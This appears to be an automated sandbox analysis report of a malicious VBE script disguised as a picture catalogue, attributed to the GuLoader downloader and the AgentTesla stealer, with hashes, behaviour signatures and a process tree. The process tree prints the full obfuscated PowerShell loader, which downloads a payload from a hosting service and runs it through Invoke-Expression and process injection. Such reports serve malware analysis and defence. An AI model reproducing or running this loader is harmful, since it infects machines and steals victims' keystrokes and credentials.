Overview

overview

10

Static

static

1

PicturesCa...on.vbe

windows7-x64

10

PicturesCa...on.vbe

windows10-2004-x64

10

Analysis

  • max time kernel
    144s
  • max time network
    141s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
  • submitted
    24-09-2024 03:36

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    PicturesCatalogforOrderSpecification.vbe

  • Size

    14KB

  • MD5

    e5b0cb3019b7a60bd58fe2d18d75be4b

  • SHA1

    7a35bcb814b31bb3f2d089cac43d6e0db6373a6a

  • SHA256

    403347a566bd33798ee17e8b7d546dbe8ec4123a849bf3a9b3f948b72caf0a0a

  • SHA512

    a54ca5b82a7c430e42c9dadb91b56e03058027fdcc2e2e8f81569d24b0e6e0032005331a1ae064632f89797334e8afd03655b2491547e93925e703f15888af40

  • SSDEEP

    384:wCQ3GOmBsxCn5NbEDE2PlWdjSsTivPTknILvTY:q39cs85ctyjSsaPT/vc

Score
10/10
agentteslaguloaderdiscoverydownloaderexecutionkeyloggerspywarestealertrojan

Malware Config

Extracted

Family

agenttesla

Credentials

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

    keyloggertrojanstealerspywareagenttesla
  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

    downloaderguloader
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

    execution
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 23 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\PicturesCatalogforOrderSpecification.vbe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2412
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Pseudoacacia ralliform Unmigrative Sjofelist #>;$Petasos='Scoopene130';<#Markedsdagens Unmistrustfully Buttering Tiahuanacan Overenskomstansat Antiredeposition Eubacteria #>;$Unallurable=$host.PrivateData;If ($Unallurable) {$Straffefanges++;}function Smaalandshavets($Flappe){$Emissionen=$Flappe.Length-$Straffefanges;for( $Barneglad=4;$Barneglad -lt $Emissionen;$Barneglad+=5){$Psalms+=$Flappe[$Barneglad];}$Psalms;}function Quandong($Expedients){ .($Carper) ($Expedients);}$expertising=Smaalandshavets 'JustMMomioIridzgasbiEl slNor lUrocaUnba/Sidd5Bi h. lee0Ster Unvi(SlibW hiriForen Undd Meso IntwG sts D.s UnfeNSoldTCoe A en1 uln0V ld. Tru0Arzu;Swel araWMicri Slen ebl6,uls4Af k;Clot BedfxHypn6 Mo 4Sena;Tria MisprTac vSam.:Mala1 Vit2terp1 N n. hak0Diba)B bl MelGDic eToxic usykJegooPlat/Gasp2A yl0Mod.1fyld0 vst0Vapu1Crot0 nre1Pl,m SejrFTriniF,narApose ecofNatuoSprox Mag/Risl1 E.c2Te,o1Berk.Eldf0 Eks ';$Serbians=Smaalandshavets 'LflauEsthsKoloeBo lr L.e- st AA.phGun oeAsecnsti t Jol ';$Exheredate=Smaalandshavets 'Sutth SchtFrugt lapOksesjeer:Whee/Phlo/syntduntrrDiheichrivNym eHone.AbscgBlomosingoKrisg onolVur eOu a.VrdecStato remmSpar/Morfu Undc und?Delee ekux DogpOscuo.enurSvn tFyld= In dBl no MucwProsn edslHjpao B,saTrumd.dfa&ForkiAmiadPara=Goni1 Maez AtmuopspcBogbjAnsvIDelaL MobPLiljrCoupOFaseyPartxNona4 Ps SPurvMguyeE I dRPetrv.nmaAManuOHoldJmu eRBehe_,npl-Ext.e ModKFamiJ arln nov7Bu iZVinkfGastmReg HUdl. ';$Engsnarernes=Smaalandshavets 'Phil>Proc ';$Carper=Smaalandshavets 'AntiiPetuEhom xBagh ';$Diaphyseal='Heliornithidae';$Partioffentlighed = Smaalandshavets ' LoaeRefec nonhMarcoTotu Pass% TalaF rgpR edp Suvd raaKrsetKrisaHare% M d\EnebS n.nyInjunA tio TandTh r.StbeNKommi ritp Imp nsp&Holl&Vel haeeOstrcNonphPersoUnpr DistRa a ';Quandong (Smaalandshavets 'Drac$CathgJaqul raoAspebPanoaIndil Poo: PlaOAksimAconvGadee delnIn edBamstcavieOdon= ire(.eckcDis m,erldV ve Angi/ ruxcAfvi Atio$ UnpPHab aMockr UfotVejriLydgoArbefHoodf Icie AfnnAchotRumflRe ri nstgRegeh bloeUnbrdCirc) udo ');Quandong (Smaalandshavets ' Med$undeg SpolDefooExotbU.sta nclFal :Flu,tRoteiUnh,ePoultSaltiSalvc M.skR,de=Antr$ IsaE TerxNotahInsoe.orarStaaetottd neraSam,tTrineTel..Skr,s StjpUdbrlC usi RettMalb( D m$ForsEBottnModegKapis ChanShu aS bfr.amwe HicrAbitnStopeMacrsPark)Sple ');Quandong (Smaalandshavets 'Mond[And N uccePe ttPe t.StriSCondeFe rrSpi vHaa.iDay,cCargeFedtPHattoKoeriSph,n UnbtHallM K iaHam nGa eaHercgUndeeArtlr Svl]Ster:Kr.f:BjerSBagheEpacc Octu ollrNonaiLog.tAngly T tPBrasrAffooOvertMetaoBltecJerno,aralCros Giav=Likv B,gg[BrudN roeCocktwels.Ele SUmbreFr mcGodsuBeprrReacistattReply SatP VitrRuskoR,thtEnteo,angc KaloUncol ,omTTmrey ,ubp ,nbeGenf]b,ug:Newi:MenaTHednlDirksSamf1,rft2 Kon ');$Exheredate=$tietick[0];$misclaim= (Smaalandshavets ' Imp$Ube.GSindL ataoor ebSophaD,rkLCoun:f ittH avOBeanBPedai ,oosGuldeIberrGleaNCapie The=,eksnHym eTromwVerd-D alO D.fBH akjUninERa ccRoldTK,nt BroesPyrsY SunSK olT ejaeBenimddsu.MininSygeeK.aptKepp.Lok w,elseSendB BegCFootL StaiAviae mprnJ ilt');$misclaim+=$Omvendte[1];Quandong ($misclaim);Quandong (Smaalandshavets 'Kalv$ViscTDrago ad.bHa liApiasSalgeCommr,okonSt meSerj.ForuH EffeOpriaBoehdP pteUmodr H asAnti[ S.i$Adj.S outeArber OvebS.lmi,navaRestnfervs,ock]Anti=Hogg$BedeeLaboxTestpBlndeFu.ertor t MyoiDes.s TuaiSor,nJ pagFrai ');$Symphile=Smaalandshavets ' Pic$D,taT Supo R,tbFaeriE.tes PreeVaugrC efn ateH id.EnerD Vico A iw Komnam.tl ordoMeniaAntadMiljFTotaisdvalSjlseSans(Ruth$R.neE ormxHerrhOplaelievr Snde eodFarmaOpgatGrupeTaxi,Komm$HjorASomanSpapsSpeckRi uuSideeSwatlIllyi Betg wrogD.uboVejoeS.igrStede MonsKamp) imc ';$Anskueliggoeres=$Omvendte[0];Quandong (Smaalandshavets 'Skom$Beskg RevL agooDolkbAft ALevoL,ili:Byr T RodrS eeaB rgNSc,ls,eatC KabeInteNNe bdDataeUnderProneJakkn GalDInteELoka=bl.c(Inhat,lyveR stsMoneTForl-FormPJakoa ndstO,sehH rn Fork$ U.eaGenenAtioSJen K .uauOps EDelsl eatINoncgAartgdow.O MisEReinRSvine LeeS Amb)Modi ');while (!$Transcenderende) {Quandong (Smaalandshavets 'Unad$Cidag,etalNonhoFolkbBa.naBa wlKrud:Sta.HChunaAzeorFor aI,qulVicedGenliArbenAnfleCath7Meni4U gt=skem$TwintSca rArchu onoeAa e ') ;Quandong $Symphile;Quandong (Smaalandshavets 'StofS tertKartaMoutrSwintAsp -Pr,sS opul B.oeBekneEngrpSto. De,o4.acr ');Quandong (Smaalandshavets 'Pr.a$Gal gD.stlP,scoOmklb.vedachill igu:A ygTUberrRullaLushnAd ps BelcAerie remnTilddmetaeAnthrLiree anvnS acdB ere Ved= For(SlarTKnkpeKa as EndtI fo-BiksP ExpaColltBevahdisc ind$ V.rAHujpnOu.tsKamakRotouTr feSirilAnpai D.fgGentg Kroo HaweColorStateE.olsNe r)lun, ') ;Quandong (Smaalandshavets ' Det$Pateg T,nlLntroAthebFedtamja lMa t:ChriCEn ee uncnMdest Glor U.soGldssTarwe Buzm rogaPo t=Mel,$ C.rgBagtlUn.io,nreb PilaEscal maa: FasSEs,ek SlirFyrsu TrepRumbpMonoeCroolUndelKlocs .steAlex+ B,n+Luft%Veni$Locut LigiInsceSt tt AnkiBedvcjurak Art.,kincFortoOffeuEvennExumtPo y ') ;$Exheredate=$tietick[$Centrosema];}$Prevalued=301004;$wayman=28491;Quandong (Smaalandshavets 'Bi e$AstagEleclJameoStalb,ystaTotalAren:A tiC CoulJol aVacusF,rapStomeSerdr agt San =Sekr ForGFnomeproctYlet-pal.CTjenoMle nZoritHj meStenn CultSexi Dub $ FutA ,penBilbsAr ekcumbuS raeOutml aemiForbg.ontgD,noo Vl.eMa.srNo,aeOpers d,c ');Quandong (Smaalandshavets 'Hosp$P,shgNejelGymnoIndbbC ulaPra.l Syg:TrepT Br.eTvann an R,gi=.als ,atr[SabbSDybdyRenws eprtVinkeAlsimTopn.ColiC stioAry,nNrmevBel.e ImprVelat Ts ]Tele:ele :CalcFTussrReveo macmLustBD oraN nfs,esoe Syn6Prol4InteSRegat AmorgnatiC,olnGentgGods(Burl$ cliCIn,olPensaLinesEjerpSej,eHyperphro)Into ');Quandong (Smaalandshavets 'Svej$ForwgS aplBr noKw pbJerraNan.l Haw:BlodBBonfjSuffeQuilr Antg Reae aannIntesMicr Grun=,krs Anti[CandSUrugyMindsM sct ante BasmPata. ichTU.dgePr sxTraptM.ut.StvnELdd nAut,cSkraoT drd DisiElatnDispgLeec].enu: T,s:GastA At S ZamCTrikIMagtIWilm. GrnGVille bratGag.SGigttSammr foniM rin GengOpht( R,m$irreTTette Su.nCoun),har ');Quandong (Smaalandshavets ' Rep$Ma,egRemalVento DribArchaRadil Gyr:StanSgivicMil r Unsu UndtBehaiFlleninteeAt.eeAngor.rgo= Tra$ plaBDepejNaaleShocrLexigJ dae AntnHa ms onv.k los.ustuAgatbSondsClubtMiljr yggiDa,nnD cogNyka(Owe $ Ar PUnctr mbeMcclvHem aRef lGranu,fskeDistdBidr, H s$ re.wEd,aaGodsyTabamIndiaNotenVare)Opst ');Quandong $Scrutineer;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2300
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Synod.Nip && echo t"
        3⤵
          PID:2388
        • C:\Windows\system32\cmd.exe
          "C:\Windows\system32\cmd.exe" /c ^"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe^" "<#Pseudoacacia ralliform Unmigrative Sjofelist #>;$Petasos='Scoopene130';<#Markedsdagens Unmistrustfully Buttering Tiahuanacan Overenskomstansat Antiredeposition Eubacteria #>;$Unallurable=$host.PrivateData;If ($Unallurable) {$Straffefanges++;}function Smaalandshavets($Flappe){$Emissionen=$Flappe.Length-$Straffefanges;for( $Barneglad=4;$Barneglad -lt $Emissionen;$Barneglad+=5){$Psalms+=$Flappe[$Barneglad];}$Psalms;}function Quandong($Expedients){ .($Carper) ($Expedients);}$expertising=Smaalandshavets 'JustMMomioIridzgasbiEl slNor lUrocaUnba/Sidd5Bi h. lee0Ster Unvi(SlibW hiriForen Undd Meso IntwG sts D.s UnfeNSoldTCoe A en1 uln0V ld. Tru0Arzu;Swel araWMicri Slen ebl6,uls4Af k;Clot BedfxHypn6 Mo 4Sena;Tria MisprTac vSam.:Mala1 Vit2terp1 N n. hak0Diba)B bl MelGDic eToxic usykJegooPlat/Gasp2A yl0Mod.1fyld0 vst0Vapu1Crot0 nre1Pl,m SejrFTriniF,narApose ecofNatuoSprox Mag/Risl1 E.c2Te,o1Berk.Eldf0 Eks ';$Serbians=Smaalandshavets 'LflauEsthsKoloeBo lr L.e- st AA.phGun oeAsecnsti t Jol ';$Exheredate=Smaalandshavets 'Sutth SchtFrugt lapOksesjeer:Whee/Phlo/syntduntrrDiheichrivNym eHone.AbscgBlomosingoKrisg onolVur eOu a.VrdecStato remmSpar/Morfu Undc und?Delee ekux DogpOscuo.enurSvn tFyld= In dBl no MucwProsn edslHjpao B,saTrumd.dfa&ForkiAmiadPara=Goni1 Maez AtmuopspcBogbjAnsvIDelaL MobPLiljrCoupOFaseyPartxNona4 Ps SPurvMguyeE I dRPetrv.nmaAManuOHoldJmu eRBehe_,npl-Ext.e ModKFamiJ arln nov7Bu iZVinkfGastmReg HUdl. ';$Engsnarernes=Smaalandshavets 'Phil>Proc ';$Carper=Smaalandshavets 'AntiiPetuEhom xBagh ';$Diaphyseal='Heliornithidae';$Partioffentlighed = Smaalandshavets ' LoaeRefec nonhMarcoTotu Pass% TalaF rgpR edp Suvd raaKrsetKrisaHare% M d\EnebS n.nyInjunA tio TandTh r.StbeNKommi ritp Imp nsp&Holl&Vel haeeOstrcNonphPersoUnpr DistRa a ';Quandong (Smaalandshavets 'Drac$CathgJaqul raoAspebPanoaIndil Poo: PlaOAksimAconvGadee delnIn edBamstcavieOdon= ire(.eckcDis m,erldV ve Angi/ ruxcAfvi Atio$ UnpPHab aMockr UfotVejriLydgoArbefHoodf Icie AfnnAchotRumflRe ri nstgRegeh bloeUnbrdCirc) udo ');Quandong (Smaalandshavets ' Med$undeg SpolDefooExotbU.sta nclFal :Flu,tRoteiUnh,ePoultSaltiSalvc M.skR,de=Antr$ IsaE TerxNotahInsoe.orarStaaetottd neraSam,tTrineTel..Skr,s StjpUdbrlC usi RettMalb( D m$ForsEBottnModegKapis ChanShu aS bfr.amwe HicrAbitnStopeMacrsPark)Sple ');Quandong (Smaalandshavets 'Mond[And N uccePe ttPe t.StriSCondeFe rrSpi vHaa.iDay,cCargeFedtPHattoKoeriSph,n UnbtHallM K iaHam nGa eaHercgUndeeArtlr Svl]Ster:Kr.f:BjerSBagheEpacc Octu ollrNonaiLog.tAngly T tPBrasrAffooOvertMetaoBltecJerno,aralCros Giav=Likv B,gg[BrudN roeCocktwels.Ele SUmbreFr mcGodsuBeprrReacistattReply SatP VitrRuskoR,thtEnteo,angc KaloUncol ,omTTmrey ,ubp ,nbeGenf]b,ug:Newi:MenaTHednlDirksSamf1,rft2 Kon ');$Exheredate=$tietick[0];$misclaim= (Smaalandshavets ' Imp$Ube.GSindL ataoor ebSophaD,rkLCoun:f ittH avOBeanBPedai ,oosGuldeIberrGleaNCapie The=,eksnHym eTromwVerd-D alO D.fBH akjUninERa ccRoldTK,nt BroesPyrsY SunSK olT ejaeBenimddsu.MininSygeeK.aptKepp.Lok w,elseSendB BegCFootL StaiAviae mprnJ ilt');$misclaim+=$Omvendte[1];Quandong ($misclaim);Quandong (Smaalandshavets 'Kalv$ViscTDrago ad.bHa liApiasSalgeCommr,okonSt meSerj.ForuH EffeOpriaBoehdP pteUmodr H asAnti[ S.i$Adj.S outeArber OvebS.lmi,navaRestnfervs,ock]Anti=Hogg$BedeeLaboxTestpBlndeFu.ertor t MyoiDes.s TuaiSor,nJ pagFrai ');$Symphile=Smaalandshavets ' Pic$D,taT Supo R,tbFaeriE.tes PreeVaugrC efn ateH id.EnerD Vico A iw Komnam.tl ordoMeniaAntadMiljFTotaisdvalSjlseSans(Ruth$R.neE ormxHerrhOplaelievr Snde eodFarmaOpgatGrupeTaxi,Komm$HjorASomanSpapsSpeckRi uuSideeSwatlIllyi Betg wrogD.uboVejoeS.igrStede MonsKamp) imc ';$Anskueliggoeres=$Omvendte[0];Quandong (Smaalandshavets 'Skom$Beskg RevL agooDolkbAft ALevoL,ili:Byr T RodrS eeaB rgNSc,ls,eatC KabeInteNNe bdDataeUnderProneJakkn GalDInteELoka=bl.c(Inhat,lyveR stsMoneTForl-FormPJakoa ndstO,sehH rn Fork$ U.eaGenenAtioSJen K .uauOps EDelsl eatINoncgAartgdow.O MisEReinRSvine LeeS Amb)Modi ');while (!$Transcenderende) {Quandong (Smaalandshavets 'Unad$Cidag,etalNonhoFolkbBa.naBa wlKrud:Sta.HChunaAzeorFor aI,qulVicedGenliArbenAnfleCath7Meni4U gt=skem$TwintSca rArchu onoeAa e ') ;Quandong $Symphile;Quandong (Smaalandshavets 'StofS tertKartaMoutrSwintAsp -Pr,sS opul B.oeBekneEngrpSto. De,o4.acr ');Quandong (Smaalandshavets 'Pr.a$Gal gD.stlP,scoOmklb.vedachill igu:A ygTUberrRullaLushnAd ps BelcAerie remnTilddmetaeAnthrLiree anvnS acdB ere Ved= For(SlarTKnkpeKa as EndtI fo-BiksP ExpaColltBevahdisc ind$ V.rAHujpnOu.tsKamakRotouTr feSirilAnpai D.fgGentg Kroo HaweColorStateE.olsNe r)lun, ') ;Quandong (Smaalandshavets ' Det$Pateg T,nlLntroAthebFedtamja lMa t:ChriCEn ee uncnMdest Glor U.soGldssTarwe Buzm rogaPo t=Mel,$ C.rgBagtlUn.io,nreb PilaEscal maa: FasSEs,ek SlirFyrsu TrepRumbpMonoeCroolUndelKlocs .steAlex+ B,n+Luft%Veni$Locut LigiInsceSt tt AnkiBedvcjurak Art.,kincFortoOffeuEvennExumtPo y ') ;$Exheredate=$tietick[$Centrosema];}$Prevalued=301004;$wayman=28491;Quandong (Smaalandshavets 'Bi e$AstagEleclJameoStalb,ystaTotalAren:A tiC CoulJol aVacusF,rapStomeSerdr agt San =Sekr ForGFnomeproctYlet-pal.CTjenoMle nZoritHj meStenn CultSexi Dub $ FutA ,penBilbsAr ekcumbuS raeOutml aemiForbg.ontgD,noo Vl.eMa.srNo,aeOpers d,c ');Quandong (Smaalandshavets 'Hosp$P,shgNejelGymnoIndbbC ulaPra.l Syg:TrepT Br.eTvann an R,gi=.als ,atr[SabbSDybdyRenws eprtVinkeAlsimTopn.ColiC stioAry,nNrmevBel.e ImprVelat Ts ]Tele:ele :CalcFTussrReveo macmLustBD oraN nfs,esoe Syn6Prol4InteSRegat AmorgnatiC,olnGentgGods(Burl$ cliCIn,olPensaLinesEjerpSej,eHyperphro)Into ');Quandong (Smaalandshavets 'Svej$ForwgS aplBr noKw pbJerraNan.l Haw:BlodBBonfjSuffeQuilr Antg Reae aannIntesMicr Grun=,krs Anti[CandSUrugyMindsM sct ante BasmPata. ichTU.dgePr sxTraptM.ut.StvnELdd nAut,cSkraoT drd DisiElatnDispgLeec].enu: T,s:GastA At S ZamCTrikIMagtIWilm. GrnGVille bratGag.SGigttSammr foniM rin GengOpht( R,m$irreTTette Su.nCoun),har ');Quandong (Smaalandshavets ' Rep$Ma,egRemalVento DribArchaRadil Gyr:StanSgivicMil r Unsu UndtBehaiFlleninteeAt.eeAngor.rgo= Tra$ plaBDepejNaaleShocrLexigJ dae AntnHa ms onv.k los.ustuAgatbSondsClubtMiljr yggiDa,nnD cogNyka(Owe $ Ar PUnctr mbeMcclvHem aRef lGranu,fskeDistdBidr, H s$ re.wEd,aaGodsyTabamIndiaNotenVare)Opst ');Quandong $Scrutineer;"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2052
          • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Pseudoacacia ralliform Unmigrative Sjofelist #>;$Petasos='Scoopene130';<#Markedsdagens Unmistrustfully Buttering Tiahuanacan Overenskomstansat Antiredeposition Eubacteria #>;$Unallurable=$host.PrivateData;If ($Unallurable) {$Straffefanges++;}function Smaalandshavets($Flappe){$Emissionen=$Flappe.Length-$Straffefanges;for( $Barneglad=4;$Barneglad -lt $Emissionen;$Barneglad+=5){$Psalms+=$Flappe[$Barneglad];}$Psalms;}function Quandong($Expedients){ .($Carper) ($Expedients);}$expertising=Smaalandshavets 'JustMMomioIridzgasbiEl slNor lUrocaUnba/Sidd5Bi h. lee0Ster Unvi(SlibW hiriForen Undd Meso IntwG sts D.s UnfeNSoldTCoe A en1 uln0V ld. Tru0Arzu;Swel araWMicri Slen ebl6,uls4Af k;Clot BedfxHypn6 Mo 4Sena;Tria MisprTac vSam.:Mala1 Vit2terp1 N n. hak0Diba)B bl MelGDic eToxic usykJegooPlat/Gasp2A yl0Mod.1fyld0 vst0Vapu1Crot0 nre1Pl,m SejrFTriniF,narApose ecofNatuoSprox Mag/Risl1 E.c2Te,o1Berk.Eldf0 Eks ';$Serbians=Smaalandshavets 'LflauEsthsKoloeBo lr L.e- st AA.phGun oeAsecnsti t Jol ';$Exheredate=Smaalandshavets 'Sutth SchtFrugt lapOksesjeer:Whee/Phlo/syntduntrrDiheichrivNym eHone.AbscgBlomosingoKrisg onolVur eOu a.VrdecStato remmSpar/Morfu Undc und?Delee ekux DogpOscuo.enurSvn tFyld= In dBl no MucwProsn edslHjpao B,saTrumd.dfa&ForkiAmiadPara=Goni1 Maez AtmuopspcBogbjAnsvIDelaL MobPLiljrCoupOFaseyPartxNona4 Ps SPurvMguyeE I dRPetrv.nmaAManuOHoldJmu eRBehe_,npl-Ext.e ModKFamiJ arln nov7Bu iZVinkfGastmReg HUdl. ';$Engsnarernes=Smaalandshavets 'Phil>Proc ';$Carper=Smaalandshavets 'AntiiPetuEhom xBagh ';$Diaphyseal='Heliornithidae';$Partioffentlighed = Smaalandshavets ' LoaeRefec nonhMarcoTotu Pass% TalaF rgpR edp Suvd raaKrsetKrisaHare% M d\EnebS n.nyInjunA tio TandTh r.StbeNKommi ritp Imp nsp&Holl&Vel haeeOstrcNonphPersoUnpr DistRa a ';Quandong (Smaalandshavets 'Drac$CathgJaqul raoAspebPanoaIndil Poo: PlaOAksimAconvGadee delnIn edBamstcavieOdon= ire(.eckcDis m,erldV ve Angi/ ruxcAfvi Atio$ UnpPHab aMockr UfotVejriLydgoArbefHoodf Icie AfnnAchotRumflRe ri nstgRegeh bloeUnbrdCirc) udo ');Quandong (Smaalandshavets ' Med$undeg SpolDefooExotbU.sta nclFal :Flu,tRoteiUnh,ePoultSaltiSalvc M.skR,de=Antr$ IsaE TerxNotahInsoe.orarStaaetottd neraSam,tTrineTel..Skr,s StjpUdbrlC usi RettMalb( D m$ForsEBottnModegKapis ChanShu aS bfr.amwe HicrAbitnStopeMacrsPark)Sple ');Quandong (Smaalandshavets 'Mond[And N uccePe ttPe t.StriSCondeFe rrSpi vHaa.iDay,cCargeFedtPHattoKoeriSph,n UnbtHallM K iaHam nGa eaHercgUndeeArtlr Svl]Ster:Kr.f:BjerSBagheEpacc Octu ollrNonaiLog.tAngly T tPBrasrAffooOvertMetaoBltecJerno,aralCros Giav=Likv B,gg[BrudN roeCocktwels.Ele SUmbreFr mcGodsuBeprrReacistattReply SatP VitrRuskoR,thtEnteo,angc KaloUncol ,omTTmrey ,ubp ,nbeGenf]b,ug:Newi:MenaTHednlDirksSamf1,rft2 Kon ');$Exheredate=$tietick[0];$misclaim= (Smaalandshavets ' Imp$Ube.GSindL ataoor ebSophaD,rkLCoun:f ittH avOBeanBPedai ,oosGuldeIberrGleaNCapie The=,eksnHym eTromwVerd-D alO D.fBH akjUninERa ccRoldTK,nt BroesPyrsY SunSK olT ejaeBenimddsu.MininSygeeK.aptKepp.Lok w,elseSendB BegCFootL StaiAviae mprnJ ilt');$misclaim+=$Omvendte[1];Quandong ($misclaim);Quandong (Smaalandshavets 'Kalv$ViscTDrago ad.bHa liApiasSalgeCommr,okonSt meSerj.ForuH EffeOpriaBoehdP pteUmodr H asAnti[ S.i$Adj.S outeArber OvebS.lmi,navaRestnfervs,ock]Anti=Hogg$BedeeLaboxTestpBlndeFu.ertor t MyoiDes.s TuaiSor,nJ pagFrai ');$Symphile=Smaalandshavets ' Pic$D,taT Supo R,tbFaeriE.tes PreeVaugrC efn ateH id.EnerD Vico A iw Komnam.tl ordoMeniaAntadMiljFTotaisdvalSjlseSans(Ruth$R.neE ormxHerrhOplaelievr Snde eodFarmaOpgatGrupeTaxi,Komm$HjorASomanSpapsSpeckRi uuSideeSwatlIllyi Betg wrogD.uboVejoeS.igrStede MonsKamp) imc ';$Anskueliggoeres=$Omvendte[0];Quandong (Smaalandshavets 'Skom$Beskg RevL agooDolkbAft ALevoL,ili:Byr T RodrS eeaB rgNSc,ls,eatC KabeInteNNe bdDataeUnderProneJakkn GalDInteELoka=bl.c(Inhat,lyveR stsMoneTForl-FormPJakoa ndstO,sehH rn Fork$ U.eaGenenAtioSJen K .uauOps EDelsl eatINoncgAartgdow.O MisEReinRSvine LeeS Amb)Modi ');while (!$Transcenderende) {Quandong (Smaalandshavets 'Unad$Cidag,etalNonhoFolkbBa.naBa wlKrud:Sta.HChunaAzeorFor aI,qulVicedGenliArbenAnfleCath7Meni4U gt=skem$TwintSca rArchu onoeAa e ') ;Quandong $Symphile;Quandong (Smaalandshavets 'StofS tertKartaMoutrSwintAsp -Pr,sS opul B.oeBekneEngrpSto. De,o4.acr ');Quandong (Smaalandshavets 'Pr.a$Gal gD.stlP,scoOmklb.vedachill igu:A ygTUberrRullaLushnAd ps BelcAerie remnTilddmetaeAnthrLiree anvnS acdB ere Ved= For(SlarTKnkpeKa as EndtI fo-BiksP ExpaColltBevahdisc ind$ V.rAHujpnOu.tsKamakRotouTr feSirilAnpai D.fgGentg Kroo HaweColorStateE.olsNe r)lun, ') ;Quandong (Smaalandshavets ' Det$Pateg T,nlLntroAthebFedtamja lMa t:ChriCEn ee uncnMdest Glor U.soGldssTarwe Buzm rogaPo t=Mel,$ C.rgBagtlUn.io,nreb PilaEscal maa: FasSEs,ek SlirFyrsu TrepRumbpMonoeCroolUndelKlocs .steAlex+ B,n+Luft%Veni$Locut LigiInsceSt tt AnkiBedvcjurak Art.,kincFortoOffeuEvennExumtPo y ') ;$Exheredate=$tietick[$Centrosema];}$Prevalued=301004;$wayman=28491;Quandong (Smaalandshavets 'Bi e$AstagEleclJameoStalb,ystaTotalAren:A tiC CoulJol aVacusF,rapStomeSerdr agt San =Sekr ForGFnomeproctYlet-pal.CTjenoMle nZoritHj meStenn CultSexi Dub $ FutA ,penBilbsAr ekcumbuS raeOutml aemiForbg.ontgD,noo Vl.eMa.srNo,aeOpers d,c ');Quandong (Smaalandshavets 'Hosp$P,shgNejelGymnoIndbbC ulaPra.l Syg:TrepT Br.eTvann an R,gi=.als ,atr[SabbSDybdyRenws eprtVinkeAlsimTopn.ColiC stioAry,nNrmevBel.e ImprVelat Ts ]Tele:ele :CalcFTussrReveo macmLustBD oraN nfs,esoe Syn6Prol4InteSRegat AmorgnatiC,olnGentgGods(Burl$ cliCIn,olPensaLinesEjerpSej,eHyperphro)Into ');Quandong (Smaalandshavets 'Svej$ForwgS aplBr noKw pbJerraNan.l Haw:BlodBBonfjSuffeQuilr Antg Reae aannIntesMicr Grun=,krs Anti[CandSUrugyMindsM sct ante BasmPata. ichTU.dgePr sxTraptM.ut.StvnELdd nAut,cSkraoT drd DisiElatnDispgLeec].enu: T,s:GastA At S ZamCTrikIMagtIWilm. GrnGVille bratGag.SGigttSammr foniM rin GengOpht( R,m$irreTTette Su.nCoun),har ');Quandong (Smaalandshavets ' Rep$Ma,egRemalVento DribArchaRadil Gyr:StanSgivicMil r Unsu UndtBehaiFlleninteeAt.eeAngor.rgo= Tra$ plaBDepejNaaleShocrLexigJ dae AntnHa ms onv.k los.ustuAgatbSondsClubtMiljr yggiDa,nnD cogNyka(Owe $ Ar PUnctr mbeMcclvHem aRef lGranu,fskeDistdBidr, H s$ re.wEd,aaGodsyTabamIndiaNotenVare)Opst ');Quandong $Scrutineer;"
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: CmdExeWriteProcessMemorySpam
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2880
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Synod.Nip && echo t"
              5⤵
              • System Location Discovery: System Language Discovery
              PID:2616
            • C:\Program Files (x86)\windows mail\wabmig.exe
              "C:\Program Files (x86)\windows mail\wabmig.exe"
              5⤵
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of SetWindowsHookEx
              PID:2596

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\2ZQ52U2QC49HJZ37FWG3.temp
      Filesize

      7KB

      MD5

      345928c0507790822baae9fdbfd95269

      SHA1

      a9316a7a60118bb5e9b3a96fbab9b5f388a5ad5c
